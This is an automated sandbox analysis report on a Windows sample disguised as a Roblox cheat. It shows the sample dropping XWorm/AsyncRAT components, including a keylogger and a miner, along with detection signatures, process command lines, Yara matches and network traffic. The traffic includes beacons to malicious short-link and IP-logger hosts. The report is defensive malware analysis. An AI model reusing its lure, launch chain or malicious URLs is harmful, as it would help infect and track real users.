Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
roblox cheat.exe

Overview

General Information

Sample name:roblox cheat.exe
Analysis ID:1484380
MD5:6b94734feac8edb9f925385163ad59c9
SHA1:3ec9cc36f11ce7836e86089631ad790e7c8fe3cc
SHA256:62d6f204244bbb976a155aa7750874a56db925c8531d76dce6bf5560440cb63c
Tags:exe
Infos:

Detection

XWorm
Score:90
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • roblox cheat.exe (PID: 4840 cmdline: "C:\Users\user\Desktop\roblox cheat.exe" MD5: 6B94734FEAC8EDB9F925385163AD59C9)
    • robloxPX1instaler.exe (PID: 3300 cmdline: "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" MD5: 27469372591B14FF1C57654FACB5E020)
    • cheatinstaler cheatinstalerF6R54T.exe (PID: 816 cmdline: "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" MD5: FC411F4D9F4DBA5104CB1549153A8684)
      • cmd.exe (PID: 6728 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\coin.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7376 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chrome.exe (PID: 7488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 7740 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2184,i,14828535627695779647,3084874413555431357,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7df8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7e95:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7faa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7aa6:$cnc4: POST / HTTP/1.1
    C:\Users\user\AppData\Local\Temp\Keyloger.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\Keyloger.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xf0e7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xf184:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xf299:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xdb4c:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\ msedge.exeJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000003.00000003.1260021270.00000225ABF82000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x8cc8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x8d65:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x8e7a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x8976:$cnc4: POST / HTTP/1.1
          Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 816JoeSecurity_XWormYara detected XWormJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Use Short Name Path in Command Line
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe, ParentCommandLine: "C:\Users\user\Desktop\roblox cheat.exe", ParentImage: C:\Users\user\Desktop\roblox cheat.exe, ParentProcessId: 4840, ParentProcessName: roblox cheat.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\robloxPX1instaler.exe" , ProcessId: 3300, ProcessName: robloxPX1instaler.exe

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-30T00:47:04.044403+0200
            SID:2022930
            Source Port:443
            Destination Port:49743
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-30T00:46:25.027588+0200
            SID:2022930
            Source Port:443
            Destination Port:49729
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: roblox cheat.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://2no.co/24RXx6HAvira URL Cloud: Label: malware
            Source: https://2no.co/Avira URL Cloud: Label: malware
            Source: https://2no.co/redirect-2Avira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeAvira: detection malicious, Label: TR/Spy.Gen
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeAvira: detection malicious, Label: TR/Spy.Gen
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeReversingLabs: Detection: 81%
            Multi AV Scanner detection for submitted file
            Source: roblox cheat.exeReversingLabs: Detection: 60%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ msedge.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\Keyloger.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: roblox cheat.exeJoe Sandbox ML: detected
            Source: roblox cheat.exe, 00000000.00000000.1243509232.00000000007A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_13cdbabc-0
            Source: roblox cheat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.7:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.7:49743 version: TLS 1.2
            Source: roblox cheat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: \rat\BitJoiner\payload\obj\Debug\payload.pdb source: roblox cheat.exe
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: roblox cheat.exe, cheatinstaler cheatinstalerF6R54T.exe.0.dr
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: roblox cheat.exe, robloxPX1instaler.exe.0.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: robloxPX1instaler.exe, 00000002.00000002.1450897262.0000000000B58000.00000002.00000001.01000000.00000006.sdmp, robloxPX1instaler.exe, 00000002.00000000.1248829949.0000000000B58000.00000002.00000001.01000000.00000006.sdmp
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16DB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16DB190
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16C40BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,3_2_00007FF6C16C40BC
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF6C16EFCA0 FindFirstFileExA,3_2_00007FF6C16EFCA0
            Source: Joe Sandbox ViewIP Address: 88.212.201.198 88.212.201.198
            Source: Joe Sandbox ViewIP Address: 18.239.18.53 18.239.18.53
            Source: Joe Sandbox ViewIP Address: 172.67.132.113 172.67.132.113
            Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
            Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
            Source: global trafficHTTP traffic detected: GET /24RXx6 HTTP/1.1Host: 2no.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /redirect/handshake.png HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1Host: counter.yadro.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2no.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.903191178197396 HTTP/1.1Host: counter.yadro.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FTID=1cg1kz1ZJrer1cg1kz0018T6; VID=2DNPIG0nbdur1cg1k-0018Z0
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdn.iplogger.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uFDCTh8d52ccRcZ&MD=g9KFUel5 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uFDCTh8d52ccRcZ&MD=g9KFUel5 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficDNS traffic detected: DNS query: ecsv2.roblox.com
            Source: global trafficDNS traffic detected: DNS query: clientsettingscdn.roblox.com
            Source: global trafficDNS traffic detected: DNS query: 2no.co
            Source: global trafficDNS traffic detected: DNS query: cdn.iplogger.org
            Source: global trafficDNS traffic detected: DNS query: counter.yadro.ru
            Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: client-telemetry.roblox.com
            Source: unknownHTTP traffic detected: POST /report/v4?s=u4EPwlIfu5u%2FXXj0kRaPdkPJwH6VqTzmIykH2X9%2Fyuj1FCpzRnd4kOm6Jqn1GDDAN13dvkMlZJ9E0adkpSW7TqU2KldHQHU11YPPbJtFEHxZlyRQ0Vh6q2i%2Fu8W3Miwh0Hqm HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 424Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 29 Jul 2024 22:46:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://bit.ly/1eMQ42U
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: roblox cheat.exe, robloxPX1instaler.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
